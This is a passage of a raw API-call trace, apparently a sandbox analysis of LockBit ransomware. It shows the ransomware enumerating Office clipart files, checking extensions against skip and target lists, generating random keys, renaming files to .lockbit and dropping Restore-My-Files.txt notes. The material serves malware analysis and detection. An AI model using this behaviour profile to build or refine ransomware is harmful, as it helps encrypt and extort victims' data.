lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.039] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.039] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF.lockbit") returned 72 [0175.039] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00212_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.040] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.040] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.040] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20338) returned 1 [0175.040] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.041] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.041] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.041] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.042] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.042] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.047] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.047] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.048] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.049] free (_Block=0x1fa2ed8) [0175.049] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.049] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.049] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.049] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f74, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00221_.WMF", cAlternateFileName="")) returned 1 [0175.049] lstrcmpiW (lpString1=".", lpString2="SO00221_.WMF") returned -1 [0175.049] lstrcmpiW (lpString1="..", lpString2="SO00221_.WMF") returned -1 [0175.049] PathFindExtensionW (pszPath="SO00221_.WMF") returned=".WMF" [0175.049] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.049] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.049] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.050] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.050] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.051] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00221_.WMF") returned -1 [0175.051] lstrcmpiW (lpString1="ntldr", lpString2="SO00221_.WMF") returned -1 [0175.051] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00221_.WMF") returned -1 [0175.051] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00221_.WMF") returned -1 [0175.051] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00221_.WMF") returned -1 [0175.052] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00221_.WMF") returned 1 [0175.052] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00221_.WMF") returned -1 [0175.052] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.052] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00221_.WMF") returned=".WMF" [0175.052] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.052] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.052] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.053] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.053] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00221_.WMF.lockbit") returned 72 [0175.053] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00221_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00221_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0175.054] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.054] malloc (_Size=0x40068) returned 0x3df0008 [0175.054] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=8052) returned 1 [0175.054] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.055] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.055] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0175.055] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.055] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0175.056] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0175.061] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00221_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00221_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.061] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.061] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0175.063] free (_Block=0x1fa2ed8) [0175.063] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00221_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.063] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.063] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.063] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00222_.WMF", cAlternateFileName="")) returned 1 [0175.063] lstrcmpiW (lpString1=".", lpString2="SO00222_.WMF") returned -1 [0175.063] lstrcmpiW (lpString1="..", lpString2="SO00222_.WMF") returned -1 [0175.063] PathFindExtensionW (pszPath="SO00222_.WMF") returned=".WMF" [0175.063] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.063] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0175.064] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0175.064] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0175.065] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SO00222_.WMF") returned -1 [0175.065] lstrcmpiW (lpString1="ntldr", lpString2="SO00222_.WMF") returned -1 [0175.065] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SO00222_.WMF") returned -1 [0175.065] lstrcmpiW (lpString1="bootsect.bak", lpString2="SO00222_.WMF") returned -1 [0175.065] lstrcmpiW (lpString1="autorun.inf", lpString2="SO00222_.WMF") returned -1 [0175.065] lstrcmpiW (lpString1="thumbs.db", lpString2="SO00222_.WMF") returned 1 [0175.065] lstrcmpiW (lpString1="iconcache.db", lpString2="SO00222_.WMF") returned -1 [0175.065] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0175.065] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00222_.WMF") returned=".WMF" [0175.065] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0175.066] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0175.066] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0175.067] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0175.067] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0175.067] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0175.067] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0175.067] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00222_.WMF.lockbit") returned 72 [0175.067] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00222_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00222_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0175.068] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0175.068] malloc (_Size=0x40068) returned 0x1ff1e60 [0175.068] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7772) returned 1 [0175.068] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0175.069] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0175.069] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0175.069] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0175.069] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0175.077] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00222_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00222_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0175.077] malloc (_Size=0xa6) returned 0x1fa2ed8 [0175.077] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0175.078] free (_Block=0x1fa2ed8) [0175.078] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00222_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0175.078] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0175.079] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0175.079] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78964d00, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x6d30c390, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x78964d00, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x3642, dwReserved0=0x0, dwReserved1=0x0, cFileName="SO00223_.WMF", cAlternateFileName="")) returned 1 [0175.079] lstrcmpiW (lpString1=".", lpString2="SO00223_.WMF") returned -1 [0175.079] lstrcmpiW (lpString1="..", lpString2="SO00223_.WMF") returned -1 [0175.079] PathFindExtensionW (pszPath="SO00223_.WMF") returned=".WMF" [0175.079] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0175.079] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0175.080] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 